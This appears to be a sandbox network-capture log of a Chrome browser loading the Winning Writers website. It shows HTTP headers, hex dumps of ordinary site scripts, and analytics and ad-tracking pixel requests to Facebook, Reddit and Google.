                                                                                                                                                                                            2024-11-18 20:00:10 UTC2570INData Raw: 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 6c 75 67 69 6e 22 29 3b 76 61 72 20 64 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 67 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 4c 6f 67 67 69 6e 67 22 29 2c 68 3d 67 2e 6c 6f 67 45 72 72 6f 72 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 45 76 65 6e 74 45 76 65 6e 74 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 45
                                                                                                                                                                                            Data Ascii: f.getFbeventsModules("SignalsFBEventsPlugin");var d=f.getFbeventsModules("SignalsParamList"),g=f.getFbeventsModules("SignalsFBEventsLogging"),h=g.logError,i=f.getFbeventsModules("SignalsFBEventsSendEventEvent"),j=f.getFbeventsModules("signalsFBEventsSendE
                                                                                                                                                                                            2024-11-18 20:00:10 UTC15302INData Raw: 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69
                                                                                                                                                                                            Data Ascii: Modules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugi


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            80192.168.2.164980966.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1035OUTGET /assets/js/feed.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _ga=GA1.2.723902191.1731960008; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610
                                                                                                                                                                                            2024-11-18 20:00:10 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "2f2-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 754
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:10 UTC754INData Raw: 0a 2f 2f 20 76 61 72 20 24 20 3d 20 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 28 29 3b 0a 0a 2f 2f 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 2f 2f 20 20 20 20 20 69 66 20 28 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 20 3e 20 34 39 39 29 20 7b 0a 2f 2f 20 20 20 20 20 20 20 20 20 69 66 28 24 28 27 2e 66 65 65 64 2d 68 65 69 67 68 74 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 7b 0a 2f 2f 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 2e 66 65 65 64 2d 68 65 69 67 68 74 27 29 2e 6d 61 74 63 68 48 65 69 67 68 74 28 7b 0a 2f 2f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 79 52 6f 77 3a 20 66 61 6c 73 65 0a 2f 2f 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 2f 2f 20 20
                                                                                                                                                                                            Data Ascii: // var $ = jQuery.noConflict();// $(document).ready(function () {// if ($(window).width() > 499) {// if($('.feed-height').length > 0){// $('.feed-height').matchHeight({// byRow: false// });//


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            81192.168.2.164981066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1047OUTGET /assets/js/responsiveslides.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _ga=GA1.2.723902191.1731960008; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610
                                                                                                                                                                                            2024-11-18 20:00:10 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "2e5e-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 11870
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:10 UTC7825INData Raw: 2f 2a 21 20 52 65 73 70 6f 6e 73 69 76 65 53 6c 69 64 65 73 2e 6a 73 20 76 31 2e 35 34 0a 20 2a 20 68 74 74 70 3a 2f 2f 72 65 73 70 6f 6e 73 69 76 65 73 6c 69 64 65 73 2e 63 6f 6d 0a 20 2a 20 68 74 74 70 3a 2f 2f 76 69 6c 6a 61 6d 69 73 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 31 2d 32 30 31 32 20 40 76 69 6c 6a 61 6d 69 73 0a 20 2a 20 41 76 61 69 6c 61 62 6c 65 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 2f 2a 6a 73 6c 69 6e 74 20 62 72 6f 77 73 65 72 3a 20 74 72 75 65 2c 20 73 6c 6f 70 70 79 3a 20 74 72 75 65 2c 20 76 61 72 73 3a 20 74 72 75 65 2c 20 70 6c 75 73 70 6c 75 73 3a 20 74 72 75 65 2c 20 69 6e 64 65 6e 74 3a 20 32 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28
                                                                                                                                                                                            Data Ascii: /*! ResponsiveSlides.js v1.54 * http://responsiveslides.com * http://viljamis.com * * Copyright (c) 2011-2012 @viljamis * Available under the MIT license *//*jslint browser: true, sloppy: true, vars: true, plusplus: true, indent: 2 */(function (
                                                                                                                                                                                            2024-11-18 20:00:10 UTC4045INData Raw: 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6c 69 64 65 54 6f 28 69 64 78 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 77 61 69 74 54 69 6d 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 49 6e 69 74 20 63 79 63 6c 65 0a 20 20 20 20 20 20 20 20 20 20 73 74 61 72 74 43 79 63 6c 65 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 73 74 61 72 74 69 6e 67 20 63 79 63 6c 65 0a 20 20 20 20 20 20 20 20 72 65 73 74 61 72 74 43 79 63 6c 65 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 73 65 74 74 69 6e 67 73 2e 61 75 74 6f 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 53 74 6f 70 0a
                                                                                                                                                                                            Data Ascii: } slideTo(idx); }, waitTime); }; // Init cycle startCycle(); } // Restarting cycle restartCycle = function () { if (settings.auto) { // Stop


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            82192.168.2.1649815151.101.129.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC678OUTGET /rp.gif?ts=1731960007980&id=t2_11an1ubt&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=814805a2-007a-47c4-a129-ea0a72736646&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc= HTTP/1.1
                                                                                                                                                                                            Host: alb.reddit.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            Server: Varnish
                                                                                                                                                                                            Retry-After: 0
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            content-type: image/gif
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                            Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                            NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.3, "failure_fraction": 0.3}
                                                                                                                                                                                            2024-11-18 20:00:10 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            83192.168.2.1649817216.239.34.1814436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1261OUTPOST /g/collect?v=2&tid=G-S2XE0RVPX9&gtm=45je4be0v889608727z8846709124za200zb846709124&_p=1731960005145&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067554~102067808~102077855~102081484&cid=723902191.1731960008&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=1&sid=1731960008&sct=1&seg=0&dl=https%3A%2F%2Fwinningwriters.com%2F&dt=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&en=page_view&_fv=1&_ss=1&tfd=9638 HTTP/1.1
                                                                                                                                                                                            Host: analytics.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC849INHTTP/1.1 204 No Content
                                                                                                                                                                                            Access-Control-Allow-Origin: https://winningwriters.com
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                            Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                            Server: Golfe2
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            84192.168.2.1649813157.240.0.354436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC910OUTGET /tr/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=GET HTTP/1.1
                                                                                                                                                                                            Host: www.facebook.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Access-Control-Allow-Origin:
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            Server: proxygen-bolt
                                                                                                                                                                                            X-FB-Connection-Quality: GOOD; q=0.7, rtt=120, rtx=0, c=10, mss=1380, tbw=3406, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            85192.168.2.1649814157.240.0.354436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1002OUTGET /privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=FGET HTTP/1.1
                                                                                                                                                                                            Host: www.facebook.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Attribution-Reporting-Eligible: event-source, trigger
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1000INHTTP/1.1 200 OK
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7438711601362653596", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                            report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7438711601362653596"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                            Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1754INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                            Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                            2024-11-18 20:00:10 UTC4INData Raw: 34 33 0d 0a
                                                                                                                                                                                            Data Ascii: 43
                                                                                                                                                                                            2024-11-18 20:00:10 UTC74INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0a 49 44 41 54 78 9c 63 00 01 00 00 05 00 01 0d 0a 2d b4 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: PNGIHDRIDATxc-IENDB`0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            86192.168.2.164981966.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC861OUTGET /assets/js/jquery-ck.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _ga=GA1.2.723902191.1731960008; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610
